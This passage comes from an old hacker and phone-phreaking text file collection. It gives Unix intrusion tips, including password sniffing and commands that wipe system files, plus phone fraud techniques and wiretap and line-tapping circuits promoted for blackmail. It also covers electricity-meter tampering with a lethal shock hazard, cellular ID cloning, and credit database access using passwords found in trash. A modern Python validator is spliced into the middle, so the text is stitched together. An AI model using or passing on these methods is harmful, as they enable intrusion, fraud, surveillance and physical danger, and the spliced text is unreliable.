is a bad way to do it, and it is much nicer if you just send a command to the
terminal to shut the system down, or whatever you are after... There is always,
*Always* an acct. called root, the most
powerful acct. to be on, since it has all of the system files on it. If you hack
your way onto this one, then everything is easy from here on... On the unix
system, the abort key is the Cntl-D key. Watch
how many times you hit this, since it is also a way to log off the system! A
little about unix architecture: The root directory, called root, is where the
system resides. After this come a few 'sub' root
directories, usually to group things (stats here, priv stuff here, the user log
here...). Under this comes the superuser (the operator of the system), and then
finally the normal users. In the unix 'Shell'
everything is treated the same.
By this we mean: You can access a program the same way you access a user
directory, and so on. The way the unix system was written, everything, users
included, are just programs belonging to the
root directory. Those of you who hacked onto the root, smile, since you can
screw everything...the main level (exec level) prompt on the unix system is the
$, and if you are on the root, you have a #
(superuser prompt). Ok, a few basics for the system... To see where you are, and
what paths are active in regards to your user account, then type
=> pwd
This shows your acct. separated by a slash with another pathname (acct.),
possibly many times. To connect through to another path, or many paths, you
would type:
You=> path1/path2/path3
And then you are connected all the way from path1 to path3. You can
run the programs on all the paths you are connected to. If it does
not allow you to connect to a path, then you have insufficient privs, or
the path is closed and archived onto tape. You can run programs this way
also:
you=> path1/path2/path3/program-name
Unix treats everything as a program, and thus there are a few commands to learn...
To see what you have access to in the end path, type:
ls
for list. This shows the programs you can run. You can connect to the root
directory and run its programs with=>
/root
By the way, most unix systems have their log file on the root, so you can set up
a watch on the file, waiting for people to log in and snatch their password as
it passes thru the file. To connect to a
directory, use the command:
=> cd pathname
This allows you to do what you want with that directory. You may be asked for a
password, but this is a good way of finding other user names to hack onto. The
wildcard character in unix, if you want
to search down a path for a game or such, is the *.
=> ls /*
Should show you what you can access. The file types are the same as they are on
a dec, so refer to that section when examining file. To see what is in a file,
use the
=> pr filename
command, for print file. We advise playing with pathnames to get the
hang of the concept. There is on-line help available on most systems with a
'help' or a '?'. We advise you look thru the
help files and pay attention to anything they give you on pathnames, or the
commands for the system. You can, as a user, create or destroy directories on
the tree beneath you. This means that root can
kill everything but root, and you can kill any that are below you. These are the
=> mkdir pathname
=> rmdir pathname
commands. Once again, you are not alone on the system... type=>
who
to see what other users are logged in to the system at the time. If you
want to talk to them=>
write username
Will allow you to chat at the same time, without having to worry about the
parser. To send mail to a user, say
=> mail
And enter the mail sub-system. To send a message to all the users on the system,
say
=> wall
Which stands for 'write all'. By the way, on a few systems, all you have to do
is hit the <return> key to end the message, but on others you must hit the
cntl-D key. To send a single message to a user,
say
=> write username
this is very handy again! If you send the sequence of characters discussed at
the very beginning of this article, you can have the super-user terminal do
tricks for you again.
Privs:
If you want superuser privs, you can either log in as root, or edit your acct.
so it can say
=> su
this now gives you the # prompt, and allows you to completely by-pass the
protection. The wonderful security conscious developers at bell made it very
difficult to do much without privs, but once you
have them, there is absolutely nothing stopping you from doing anything you want
to. To bring down a unix system:
=> chdir /bin
=> rm *
this wipes out the pathname bin, where all the system maintenance files are. Or
try:
=> r -r
This recursively removes everything from the system except the remove command
itself. Or try:
=> kill -1,1
=> sync
This wipes out the system devices from operation. When you are finally sick and
tired from hacking on the vax systems, just hit your cntl-d and repeat key, and
you will eventually be logged out.
The reason this file seems to be very sketchy is the fact that bell has 7
licensed versions of unix out in the public domain, and these commands are those
common to all of them. I recommend you hack
onto the root or bin directory, since they have the highest levels of privs, and
there is really not much you can do (except develop software) without them.
108.Verification Circuits by The Jolly Roger
1. One busy verification conference circuit is always provided. The circuit is a
three-way conference bridge that enables an operator to verify the busy/idle
condition of a subscriber line. Upon
request of a party attempting to reach a specified directory number, the
operator dials the called line number to determine if the line is in use, if the
receiver is off the hook, or if the line is in lockout due
to a fault condition. The operator then returns to the party trying to reach the
directory number and states the condition of the line. Lines with data security
cannot be accessed for busy verification
when the line is in use. (Refer also to data security.)
2. Three ports are assigned to each busy verification conference circuit. One
port is for operator access and two ports are used to split an existing
connection. To verify the busy/idle condition
of a line, the operator establishes a connection to the operator access port and
dials the directory number of the line to be verified. If the line is in use,
the existing connection is broken and immediately
re-established through the other two ports of the busy verification circuit
without interruption. Busy verification circuit is controlled by access code. A
dedicated trunk can be used but is not necessary.
3. The busy verification circuit also can be used for test verify from the wire
chief's test panel B. Additional busy verification conference circuits (002749)
there it is right out of an ESS manual
word for word! And I'm getting 25 linear feet of ESS manuals!!! Not counting the
stack received so far!
109.White Box Plans by The Jolly Roger
Introduction:
The White Box is simply a portable touch-tone keypad. For more information on
touch-tone, see my Silver Box Plans.
Materials:
· 1 Touch-Tone Keypad
· 1 Miniature 1000 to 8 Ohm Transformer (Radio Shack # 273-1380)
· 1 Standard 8 Ohm Speaker
· 2 9V Batteries
· 2 9V Battery Clips
Procedure:
1. Connect the Red Wire from the Transformer to either terminal on the speaker.
2. Connect the White Wire from the transformer to the other terminal on the
speaker.
3. Connect the Red Wire from one Battery Clip to the Black Wire from the other
Battery Clip.
4. Connect the Red Wire from the second Battery Clip to the Green Wire from the
Keypad.
5. Connect the Blue Wire from the Keypad to the Orange/Black Wire from the
Keypad.
6. Connect the Black Wire from the first Battery Clip to the two above wires
(Blue and Black/Orange).
7. Connect the Black Wire from the Keypad to the Blue Wire from the Transformer.
8. Connect the Red/Green Wire from the Keypad to the Green Wire from the
Transformer.
9. Make sure the Black Wire from the Transformer and the remaining wires from
the Keypad are free.
10. Hook up the Batteries.
Optional:
1. Put it all in a case.
2. Add a Silver Box to it.
Use:
Just use it like a normal keypad, except put the speaker next to the receiver of
the phone you're using.
110.The BLAST Box by The Jolly Roger
Ever want to really make yourself be heard? Ever talk to someone on the phone
who just doesn't shut up? Or just call the operator and pop her eardrum? Well,
up until recently it has been impossible
for you to do these things. That is, unless of course you've got a blast box.
All a blast box is, is a really cheap amplifier, (around 5 watts or so)
connected in place of the microphone on your telephone.
It works best on model 500 AT&T Phones, and if constructed small enough, can be
placed inside the phone.
Construction:
Construction is not really important. Well it is, but since I'm letting you make
your own amp, I really don't have to include this.
Usage:
Once you've built your blast box, simply connect a microphone (or use the
microphone from the phone) to the input of the amplifier, and presto. There it
is. Now, believe it or not, this device actually
works. (At least on crossbar.) It seems that Illinois bell switching systems
allow quite a lot of current to pass right through the switching office, and out
to whoever you're calling. When
you talk in the phone, it comes out of the other phone (again it works best if
the phone that you're calling has the standard western electric earpiece)
incredibly loud. This device is especially good for
PBS Subscription drives. Have "Phun", and don't get caught!
111.Dealing with the Rate & Route Operator by The Jolly Roger
It seems that fewer and fewer people have blue boxes these days, and that is
really too bad. Blue boxes, while not all that great for making free calls
(since the TPC can tell when the call was made, as
well as where it was to and from), are really a lot of fun to play with. Short
of becoming a real live TSPS operator, they are about the only way you can
really play with the network.
For the few of you with blue boxes, here are some phrases which may make life
easier when dealing with the rate & route (R&R) operators. To get the R&R op,
you send a KP + 141 + ST. In some
areas you may need to put another NPA before the 141 (i.e., KP + 213 + 141 +
ST), if you have no local R&R ops.
The R&R operator has a myriad of information, and all it takes to get this data
is mumbling cryptic phrases. There are basically four special phrases to give
the R&R ops. They are NUMBERS route,
DIRECTORY route, OPERATOR route, and PLACE NAME.
To get the area code for a city, one can call the R&R operator and ask for
the numbers route. For example, to find the area code for Carson City, Nevada,
we'd ask the R&R op for "Carson
City, Nevada, numbers route, please." and get the answer, "Right... 702 plus."
meaning that 702 plus 7 digits gets us there.
Sometimes directory assistance isn't just NPA+131. The way to get these routings
is to call R&R and ask for "Anaheim, California, directory route, please." Of
course, she'd tell us it was 714 plus,
which means 714 + 131 gets us the D.A. op there. This is a sort of pointless
example, but I couldn't come up with a better one on short notice.
Let's say you wanted to find out how to get to the inward operator for
Sacramento, California. The first six digits of a number in that city will be
required (the NPA and an NXX). For example, let us
use 916 756. We would call R&R, and when the operator answered, say, "916 756,
operator route, please." The
operator would say, "916 plus 001 plus." This means that 916 + 001 + 121 will
get you the inward operator for Sacramento. Do you know the city which
corresponds to 503 640? The R&R
operator does, and will tell you that it is Hillsboro, Oregon, if you sweetly
ask for "Place name, 503 640, please."
For example, let's say you need the directory route for Sveg, Sweden. Simply
call R&R, and ask for, "International, Baden, Switzerland. TSPS directory route,
please." In response to this, you'd get,
"Right... Directory to Sveg, Sweden. Country code 46 plus 1170." So you'd route
yourself to an international sender, and send 46 + 1170 to get the D.A. operator
in Sweden.
Inward operator routings to various countries are obtained the same way
"International, London, England, TSPS inward route, please." and get "Country
code 44 plus 121." Therefore, 44 plus 121
gets you inward for London.
Inwards can get you language assistance if you don't speak the language. Tell
the foreign inward, "United States calling. Language assistance in completing a
call to (called party) at (called number)."
R&R operators are people too, y'know. So always be polite, make sure
use of 'em, and dial with care.
112.Cellular Phreaking by The Jolly Roger
The cellular/mobile phone system is one that is perfectly set up to be exploited
by phreaks with the proper knowledge and equipment. Thanks to deregulation, the
regional BOC's (Bell Operating
Companies) are scattered and do not communicate much with each other. Phreaks
can take advantage of this by pretending to be mobile phone customers whose
"home base" is a city served by a
different BOC, known as a "roamer". Since it is impractical for each BOC to keep
track of the customers of all the other BOC's, they will usually allow the
customer to make the calls he wishes, often
with a surcharge of some sort.
The bill is then forwarded to the roamer's home BOC for collection. However, it
is fairly simple (with the correct tools) to create a bogus ID number for your
mobile phone, and pretend to be a roamer
from some other city and state, that's "just visiting". When your BOC tries to
collect for the calls from your alleged "home BOC", they will discover you are
not a real customer; but by then, you can
create an entirely new electronic identity, and use that instead.
How does the cellular system know who is calling, and where they are? When a
mobile phone enters a cell's area of transmission, it transmits its phone number
and its 8 digit ID number to that cell, who
will keep track of it until it gets far enough away that the sound quality is
sufficiently diminished, and then the phone is "handed off" to the cell that the
customer has walked or driven into. This process
continues as long as the phone has power and is turned on. If the phone is
turned off (or the car is), someone attempting to call the mobile phone will
receive a recording along the lines of "The mobile
phone customer you have dialed has left the vehicle or driven out of the service
area." When a call is made to a mobile phone, the switching equipment will check
to see if the mobile phone being
called is "logged in", so to speak, or present in one of the cells. If it is,
the call will then act (to the speaking parties) just like a normal call - the
caller may hear a busy tone, the phone may just ring, or
the call may be answered.
How does the switching equipment know whether or not a particular phone is
authorized to use the network? Many times, it doesn't. When a dealer installs a
mobile phone, he gives the phone's ID
number (an 8 digit hexadecimal number) to the local BOC, as well as the phone
number the BOC assigned to the customer. Thereafter, whenever a phone is present
in one of the cells, the two
numbers are checked - they should be registered to the same person. If they
don't match, the telco knows that an attempted fraud is taking place (or at
best, some transmission error) and will not allow
calls to be placed or received at that phone. However, it is impractical
(especially given the present state of deregulation) for the telco to have
records of every cellular customer of every BOC.
Therefore, if you're going to create a fake ID/phone number combination, it will
need to be "based" in an area that has a cellular system (obviously), has a
different BOC than your local area does, and
has some sort of a "roamer"
agreement with your local BOC.
How can one "phreak" a cellular phone? There are three general areas when
phreaking cellular phones; using one you found in an unlocked car (or an
unattended walk-about model), modifying your
own chip set to look like a different phone, or recording the phone number/ID
number combinations sent by other local cellular phones, and using those as your
own. Most cellular phones include a
crude "password" system to keep unauthorized users from using the phone -
however, dealers often set the password (usually a 3 to 5 digit code) to the
last four digits of the customer's mobile phone
number. If you can find that somewhere on the phone, you're in luck. If not, it
shouldn't be TOO hard to hack, since most people aren't smart enough to use
something besides "1111", "1234", or
whatever. If you want to modify the chip set in a cellular phone you bought (or
stole), there are two chips (of course, this depends on the model and
manufacturer, yours may be different) that will need to be changed - one
installed at the manufacturer (often epoxied in) with the phone's ID number, and
one installed by the dealer with the phone
number, and possibly the security code. To do this, you'll obviously need an
EPROM burner as well as the same sort of chips used in the phone (or a friendly
and unscrupulous dealer!). As to
recording the numbers of other mobile phone customers and using them; as far as
I know, this is just theory... but it seems quite possible, if you've got the
equipment to record and decode it. The
cellular system would probably freak out if two phones (with valid ID/phone
number combinations) were both present in the network at once, but it remains to
be seen what will happen.
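The registration check this section describes, written from the carrier's side as an added example that is not part of the original text: the announced phone number and 8-digit hexadecimal ID must match the subscriber record, roamers are verified with their home carrier instead of being trusted, and the same pair heard in two non-neighbouring cells within a short window raises an alert. The class names, verdict strings, 120-second window, cell adjacency map and all sample records are assumptions constructed for illustration.

```python
"""Registry-side validation of mobile registrations (added illustration).

Every name and value here is constructed; nothing comes from a real carrier.
"""
from dataclasses import dataclass
import re

ID_RE = re.compile(r"[0-9A-F]{8}")  # the 8-digit hexadecimal ID from the text


@dataclass(frozen=True)
class Registration:
    ts: int         # seconds since the start of the sample
    cell: str       # cell site that heard the phone
    number: str     # phone number the handset announced
    phone_id: str   # ID number the handset announced


class Registry:
    def __init__(self, home, partner_lookup, adjacent, window=120,
                 verify_roamers=True):
        self.home = home                      # our customers: number -> ID
        self.partner_lookup = partner_lookup  # asks the roamer's home carrier
        self.adjacent = adjacent              # cell -> neighbouring cells
        self.window = window                  # seconds; assumed threshold
        self.verify_roamers = verify_roamers
        self.last_seen = {}                   # (number, ID) -> (ts, cell)

    def check(self, reg):
        phone_id = reg.phone_id.upper()
        if not ID_RE.fullmatch(phone_id):
            return "REJECT_MALFORMED"

        if reg.number in self.home:
            expected = self.home[reg.number]
        elif self.verify_roamers:
            # Default deny: no answer from the home carrier means no service.
            expected = self.partner_lookup(reg.number)
            if expected is None:
                return "REJECT_UNVERIFIED_ROAMER"
        else:
            # Weak policy described in the text: take the roamer's word.
            expected = phone_id

        if expected != phone_id:
            return "REJECT_MISMATCH"

        # A handoff moves a phone to the same or a neighbouring cell. The same
        # pair heard in a distant cell inside the window suggests a duplicate.
        key = (reg.number, phone_id)
        prev = self.last_seen.get(key)
        self.last_seen[key] = (reg.ts, reg.cell)
        if prev is not None:
            prev_ts, prev_cell = prev
            near = (reg.cell == prev_cell
                    or reg.cell in self.adjacent.get(prev_cell, set()))
            if reg.ts - prev_ts <= self.window and not near:
                return "ALERT_DUPLICATE"
        return "ACCEPT"


# Constructed sample records (fictional 555-01xx numbers).
HOME = {"5550100": "A1B2C3D4"}
PARTNER = {"5550177": "0F0F0F0F"}        # what a partner carrier would confirm
ADJACENT = {"cell-A": {"cell-B"},
            "cell-B": {"cell-A", "cell-C"},
            "cell-C": {"cell-B"}}
EVENTS = [
    Registration(0, "cell-A", "5550100", "A1B2C3D4"),    # home customer
    Registration(30, "cell-B", "5550100", "A1B2C3D4"),   # normal handoff
    Registration(60, "cell-A", "5550100", "DEADBEEF"),   # ID does not match
    Registration(90, "cell-C", "5550199", "12345678"),   # unknown roamer
    Registration(100, "cell-A", "5550177", "0F0F0F0F"),  # confirmed roamer
    Registration(110, "cell-C", "5550177", "0F0F0F0F"),  # same pair, far cell
    Registration(120, "cell-A", "5550100", "XYZ"),       # not an 8-digit ID
]


def run(events, verify_roamers):
    """Return the verdict for each event under the chosen roamer policy."""
    registry = Registry(HOME, PARTNER.get, ADJACENT,
                        verify_roamers=verify_roamers)
    return [registry.check(e) for e in events]


if __name__ == "__main__":
    for event, strict, weak in zip(EVENTS, run(EVENTS, True), run(EVENTS, False)):
        print(f"{event.ts:>4} {event.cell} {event.number} "
              f"verify={strict:<25} trust={weak}")
```

Comparing the two policy columns shows that only the unknown roamer changes verdict, which is the gap the text attributes to carriers not sharing subscriber records.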
113.Cheesebox Plans by The Jolly Roger
A Cheesebox (named for the type of box the first one was found in) is a type of
box which will, in effect, make your telephone a Pay-Phone.....This is a simple,
modernized, and easy way of doing it....
Inside Info: These were first used by bookies many years ago as a way of making
calls to people without being called by the cops or having their numbers traced
and/or tapped......
How To Make A Modern Cheese Box
Ingredients:
· 1 Call Forwarding service on the line
· 1 Set of Red Box Tones
· The number to your prefix's Intercept operator (do some scanning for this one)
How To:
After you find the number to the intercept operator in your prefix, use your
call-forwarding and forward all calls to her...this will make your phone stay
off the hook(actually, now it waits for a quarter to
be dropped in)...you now have a cheese box... In Order To Call Out On This Line:
You must use your Red Box tones and generate the quarter dropping in...then, you
can make phone calls to
people...as far as I know, this is fairly safe, and they do not check
much...Although I am not sure, I think you can even make credit-card calls from
a cheesebox phone and not get traced...
114.How to start your own conferences! by The Jolly Roger
Black Bart showed how to start a conference call thru an 800 exchange, and I
will now explain how to start a conference call in a more orthodox fashion, the
2600Hz. Tone.
Firstly, the fone company has what is called switching systems. There are
several types, but the one we will concern ourselves with, is ESS (electronic
switching system). If your area is zoned for ESS,
do not start a conference call via the 2600Hz. Tone, or bell security will nail
your ass! To find out if you are under ESS, call your local business office, and
ask them if you can get call
waiting/forwarding, and if you can, that means that you are in ESS country, and
conference calling is very, very dangerous!!! Now, if you are not in ESS, you
will need the following equipment:
· An Apple CAT II modem
· A copy of TSPS 2 or CAT'S Meow
· A touch tone fone line
· A touch tone fone. (True tone)
Now, with TSPS 2, do the following:
1. Run tsps 2
2. Choose option 1
3. Choose option 6
4. Choose sub-option 9
5. Now type: 1-514-555-1212 (dashes are not needed)
6. Listen with your handset, and as soon as you hear a loud click, then type: $
to generate the 2600 hz. Tone. This obnoxious tone will continue for a few
seconds, then listen again and you should hear another loud 'click'.
7. Now type: km2130801050s
· 'K' = kp tone
· 'M' = multi frequency mode
· 'S' = s tone
8. Now listen to the handset again, and wait until you hear the 'click' again.
Then type: km2139752975s
· 2139751975 is the number to bill the conference call to.
Note: 213-975-1975 is a disconnected number, and I strongly advise that you only
bill the call to this number, or the fone company will find out, and then..
remember, conference calls are itemized, so
if you do bill it to an enemy's number, he can easily find out who did it and he
can bust you!
You should now hear 3 beeps, and a short pre-recorded message. From here on,
everything is all menu driven.
Conference call commands
From the '#' mode:
· 1 = call a number
· 6 = transfer control
· 7 = hangs up the conference call
· 9 = will call a conference operator
Stay away from 7 and 9! If for some reason an operator gets on-line, hang up! If
you get a busy signal after km2130801050s, that means that the teleconference
line is temporarily down. Try later,
preferably from 9am to 5pm week days, since conference calls are primarily
designed for business people.
115.Gold Box Plans by The Jolly Roger
HOW TO BUILD IT
You will need the following:
· Two 10K OHM and three 1.4K OHM resistors
· Two 2N3904 transistors
· Two Photo Cells
· Two Red LED'S (The more light produced the better)
· A box that will not let light in
· Red and Green Wire
Light from the #1 LED must shine directly on the photocell #1. The gold box I
made needed the top of the LED's to touch the photo cell for it to work.
The same applies to the #2 photo cell and LED.
1
:-PHOTOCELL--:
: :
: :BASE
: 1 TTTTT
: +LED- TRANSISTOR
: TTTTT
: : :
: -I(-- : :COLLECTOR
RED1--< >:--: :-------:-----GREEN2
-I(-- : ----------:
: :
2 :-/+/+/-/+/+/-/+/+/-/+/+/
LED 10K 10K 1.4K 1.4K
RESISTORES
2
-PHOTOCELL-----------------
: :
:BASE :
TTTTT :
TRANSISTOR :
TTTTT :
: :EMITTER :
GREEN1- --------------------------RED2
: :
/+/+/
1.4K
The 1.4K resistor is variable and if the second part of the gold box is skipped
it will still work but when someone picks up the phone they will hear a faint
dial tone in the background and might report it
to the Gestapo er...(AT&T). 1.4K will give you good reception with little risk
of a Gestapo agent at your door.
Now that you have built it take two green wires of the same length and strip the
ends, twist two ends together and connect them to green1 and place a piece of
tape on it with "line #1" writing on it.
Continue the process with red1 only use red wire. Repeat with red2 and green2
but change to line #2.
HOW TO INSTALL
You will need to find two phone lines that are close together. Label one of the
phone lines "Line #1". Cut the phone lines and take the outer coating off it.
There should be 4 wires. Cut the yellow and
black wires off and strip the red and green wires for both lines.
Line #1 should be in two pieces. Take the green wire of one end and connect it
to one of the green wires on the gold box. Take the other half of line #1 and
hook the free green wire to the green wire
on the phone line. Repeat the process with red1 and the other line. All you need
to do now is to write down the phone numbers of the place you hooked it up at
and go home and call it. You should get
a dial tone!!! If not, try changing the emitter with the collector.
116.The History of ESS by The Jolly Roger
Of all the new 1960s wonders of telephone technology - satellites, ultra modern
Traffic Service Positions (TSPS) for operators, the picturephone, and so on -
the one that gave Bell Labs the most
trouble, and unexpectedly became the greatest development effort in Bell
System's history, was the perfection of an electronic switching system, or ESS.
It may be recalled that such a system was the specific end in view when the
project that had culminated in the invention of the transistor had been launched
back in the 1930s. After successful
accomplishment of that planned miracle in 1947-48, further delays were brought
about by financial stringency and the need for further development of the
transistor itself. In the early 1950s, a Labs
team began serious work on electronic switching. As early as 1955, Western
Electric became involved when five engineers from the Hawthorne works were
assigned to collaborate with the Labs on
the project. The president of AT&T, in 1956, wrote confidently, "At Bell Labs,
development of the new electronic switching system is going full speed ahead. We
are sure this will lead to many
improvements in service and also to greater efficiency. The first service trial
will start in Morris, Ill., in 1959." Shortly thereafter, Kappel said that the
cost of the whole project would probably be $45
million.
But it gradually became apparent that the development of a commercially usable
electronic switching system - in effect, a computerized telephone exchange -
presented vastly greater technical problems
than had been anticipated, and that, accordingly, Bell Labs had vastly
underestimated both the time and the investment needed to do the job. The year
1959 passed without the promised first trial at
Morris, Illinois; it was finally made in November 1960, and quickly showed how
much more work remained to be done. As time dragged on and costs mounted, there
was a concern at AT&T and
something approaching panic at Bell Labs. But the project had to go forward; by
this time the investment was too great to be sacrificed, and in any case,
forward projections of increased demand for
telephone service indicated that within a few years a time would come when,
without the quantum leap in speed and flexibility that electronic switching
would provide, the national network would be
unable to meet the demand. In November 1963, an all-electronic switching system
went into use at the Brown Engineering Company at Cocoa Beach, Florida. But this
was a small installation,
essentially another test installation, serving only a single company. Kappel's
tone on the subject in the 1964 annual report was, for him, almost
apologetic: "Electronic switching equipment must be
manufactured in volume to unprecedented standards of reliability.... To turn out
the equipment economically and with good speed, mass production methods must be
developed; but, at the same time,
there can be no loss of precision..." Another year and millions of dollars
later, on May 30, 1965, the first commercial electric central office was put
into service at Succasunna, New Jersey.
Even at Succasunna, only 200 of the town's 4,300 subscribers initially had the
benefit of electronic switching's added speed and additional services, such as
provision for three party conversations and
automatic transfer of incoming calls. But after that, ESS was on its way. In
January 1966, the second commercial installation, this one serving 2,900
telephones, went into service in Chase, Maryland.
By the end of 1967 there were additional ESS offices in California, Connecticut,
Minnesota, Georgia, NY, Florida, and Pennsylvania; by the end of 1970 there were
120 offices serving 1.8 million
customers; and by 1974 there were 475 offices serving 5.6 million customers.
The difference between conventional switching and electronic switching is the
difference between "hardware" and "software"; in the former case, maintenance is
done on the spot, with screwdriver and
pliers, while in the case of electronic switching, it can be done remotely, by
computer, from a central point, making it possible to have only one or two
technicians on duty at a time at each switching
center. The development program, when the final figures were added up, was found
to have required a staggering four thousand man-years of work at Bell Labs and
to have cost not $45 million but
$500 million!
117.The Lunch Box by The Jolly Roger
Introduction
The Lunch Box is a VERY simple transmitter which can be handy for all sorts of
things. It is quite small and can easily be put in a number of places. I have
successfully used it for tapping fones, getting
inside info, blackmail and other such things. The possibilities are endless. I
will also include the plans for an equally small receiver for your newly made
toy. Use it for just about anything. You can also
make the transmitter and receiver together in one box and use it as a walkie
talkie.
Materials you will need
· (1) 9 volt battery with battery clip
· (1) 25-mfd, 15 volt electrolytic capacitor
· (2) .0047 mfd capacitors
· (1) .022 mfd capacitor
· (1) 51 pf capacitor
· (1) 365 pf variable capacitor
· (1) Transistor antenna coil
· (1) 2N366 transistor
· (1) 2N464 transistor
· (1) 100k resistor
· (1) 5.6k resistor
· (1) 10k resistor
· (1) 2meg potentiometer with SPST switch
· Some good wire, solder, soldering iron, board to put it on, box (optional)
Schematic for The Lunch Box
This may get a tad confusing but just print it out and pay attention.
[!]
!
51 pf
!
---+---- ------------base collector
! )( 2N366 +----+------/\/\/----GND
365 pf () emitter !
! )( ! !
+-------- ---+---- ! !
! ! ! ! !
GND / .022mfd ! !
10k\ ! ! !
/ GND +------------------------emitter
! ! ! 2N464
/ .0047 ! base collector
2meg \----+ ! ! +--------+ !
/ ! GND ! ! !
GND ! ! !
+-------------+.0047+--------------------+ ! !
! +--25mfd-----+
-----------------------------------------+ ! !
microphone +--/\/\/-----+
---------------------------------------------+ 100k !
!
GND---->/<---------------------!+!+!+---------------+
switch Battery
from 2meg pot.
Notes about the schematic
1. GND means ground
2. The GND near the switch and the GND by the 2meg potentiometer should be
connected.
3. Where you see: )(
()
)( it is the transistor antenna coil with 15 turns of regular hook-up wire
around it.
4. The middle of the loop on the left side (the left of "()") you should run a
wire down to the "+" which has nothing attached to it. There is a .0047
capacitor on the correct piece of wire.
5. For the microphone use a magnetic earphone (1k to 2k).
6. Where you see "[!]" is the antenna. Use about 8 feet of wire to broadcast
approx. 300ft. Part 15 of the FCC rules and regulation says you can't broadcast
over 300 feet without a license.
(Hahaha). Use more wire for an antenna for longer distances. (Attach it to the
black wire on the fone line for about a 250 foot antenna!)
Operation of the Lunch Box
This transmitter will send the signals over the AM radio band. You use the
variable capacitor to adjust what freq. you want to use. Find a good unused
freq. down at the lower end of the scale and
you're set. Use the 2 meg pot. to adjust gain. Just fuck with it until you get
what sounds good. The switch on the 2meg is for turning the Lunch Box on and
off. When everything is adjusted, turn on an
AM radio adjust it to where you think the signal is. Have a friend lay some shit
thru the Box and tune in to it. That's all there is to it. The plans for a
simple receiver are shown below:
The Lunch Box receiver
· (1) 9 volt battery with battery clip
· (1) 365 pf variable capacitor
· (1) 51 pf capacitor
· (1) 1N38B diode
· (1) Transistor antenna coil
· (1) 2N366 transistor
· (1) SPST toggle switch
· (1) 1k to 2k magnetic earphone
Schematic for receiver
[!]
!
51 pf
!
+----+----+
! !
) 365 pf
(----+ !
) ! !
+---------+---GND
!
+---*>!----base collector-----
diode 2N366 earphone
emitter +-----
! !
GND !
-
+
- battery
+
GND------>/<------------+
switch
Closing statement
These two devices can be built for under a total of $10.00. Not too bad. Using
these devices in illegal ways is your option. If you get caught, I accept NO
responsibility for your actions. This can be a lot
of fun if used correctly. Hook it up to the red wire on the phone line and it
will send the conversation over the air waves.
118.Olive Box Plans by The Jolly Roger
This is a relatively new box, and all it basically does is serve as a phone
ringer. You have two choices for ringers, a piezoelectric transducer (ringer),
or a standard 8 ohm speaker. The speaker has a
more pleasant tone to it, but either will do fine. This circuit can also be used
in conjunction with a rust box to control an external something or other when
the phone rings. Just connect the 8 ohm
speaker output to the inputs on the rust box, and control the pot to tune it to
light the light (which can be replaced by a relay for external controlling) when
the phone rings.
______________
| | ^
NC --|-- 5 4 --|-----/\/\/------->G
| | / R2
G<----)|----|-- 6 3 --|-- NC
| C3 | U1 |
-------|-- 7 2 --|---------- --- -- - > TO RINGER
| |
----|-- 8 1 --|--
| |______________| |
| ---/\/\/----|(----- L1
| R1 C1
------------------------------------------ L2
a. Main ringer TTL circuit
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
_
FROM PIN 2 < - -- --- ----------| |_| |------------->G
P1
b. Piezoelectric transducer
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
__ /|
FROM PIN 2 < - -- --- ---------|(---------. .-------| |/ |
>||< |S1| |
>||< --| | |
>||< | |__|\ |
G<---------.>||<.--- \|
T1
c. Electromagnetic transducer
Parts List
· U1 - Texas Instruments TCM1506
· T1 - 4000:8 ohm audio transformer
· S1 - 8 ohm speaker
· R1 - 2.2k resistor
· R2 - External variable resistor; adjusts timing frequency
· C1 - .47uF capacitor
· C2 - .1uF capacitor
· C3 - 10uF capacitor
· L1 - Tip
· L2 - Ring
· L1 and L2 are the phone line.
Shift Rate:
This is the formula for determining the shift rate:
$$SR = \frac{1}{DSR\left(\frac{1}{f1}\right) + DSR\left(\frac{1}{f2}\right)} = \frac{1}{\frac{128}{1714} + \frac{128}{1500}} = 6\tfrac{1}{4}\ \text{Hz}$$
· DSR = Shift Divider Rate ratio = 128
· f1 = High Output Frequency = 1714
· f2 = Low Output Frequency = 1500
119.The Tron Box by The GREAT Captain Crunch!!
------------------R-----F----
I I I I
I I I I-
(C) (C) (C)
I I I I-
I I I I
-----------------------------
· (C)=capacitor
· F =fuse
· R =resistor
· I,- are wire
Parts List:
· (3) electrolytic capacitors rated at 50V(lowest) .47UF
· (1) 20-30 OHM ½ Watt resistor
· (1) 120Volt fuse (amp rating best to use at least half of total house current
or even less it keeps you from blowing your breaker just in case...)
· (1) power cord (cut up an extension cord. Need plug part and wire)
· (1) electrically insulated box for the rest of us. If you don't feel
comfortable about electricity then don't play with this. There is voltage
present that will ***kill you***.
The thing works when the load in your house is low like at night time. It will
put a reverse phase signal on the line and cancel out the other phase and put a
reverse phase running everything in the house.
Well if you have ever switched the power leads on a DC (battery powered) motor
you will see that it runs backwards well your electric meter sort of works this
way...so reverse phase makes the
meter slow down and if you're lucky it will go backwards. Anyway it means a
cheaper electric bill.
120.More TRW Info by The Jolly Roger
TRW is a large database in which companies and banks can run credit checks on
their customers. Example: John Jones orders $500 worth of stereo equipment from
the Joe Blow Electronic
distributing Co. Well it could be that he gave the company a phony credit card
number, or doesn't have enough credit, etc. Well they call up TRW and then run a
check on him, TRW then lists his card
numbers (everything from sears to visa) and tells the numbers, credit, when he
lost it last (if he ever did) and then of course tells if he has had any prior
problems paying his bills.
I would also like to add that although TRW contains information on millions of
people, not every part of the country is served, although the major area are..
So if you hate someone and live in a small
state, you probably wont be able to order him 300 pink toilet seats from K-mart.
Logging on
To log on, you dial-up your local access number (or long-distance, what ever
turns you on) and wait for it to say "TRW" at this prompt, you type either an
"A" or a "Ctrl-G" and it will say "circuit
building in progress" it will wait for a minute and then clear the screen, now
you will type one of the following.
Tca1
Tca2
Tnj1
Tga1
This is to tell it what geographical area the customer is in, it really doesn't
matter which you use, because TRW will automatically switch when it finds the
record..
Next, you will type in the pswd and info on the person you are trying to get
credit info on. You type it in a format like this:
Rts Pswd Lname Fname ...,House number First letter of street name Zip <cr> now
you type ctrl s and 2 ctrl-Q's here is what it looks like in real life:
Ae: Dialing xxx-xxx-xxxx
(screen clear)
TRW ^G
circuit building in progress
(pause . . . screen clear)
Tca1
Rtc 3966785-cm5 Johnson David ...,4567
R 56785
^s ^q ^q
and then it will wait for a few seconds and print out the file on him (if it can
locate one for the guy)
Note: You may have to push return when you first connect to get the systems
attention.
Getting Your Passwords
To obtain pswds, you go down to your favorite bank or sears store and dig
through the trash (hence the name trashing) looking for printouts, if they are a
big enough place, and live in a TRW area, then
they will probably have some. The printouts will have the 7 digit subscriber
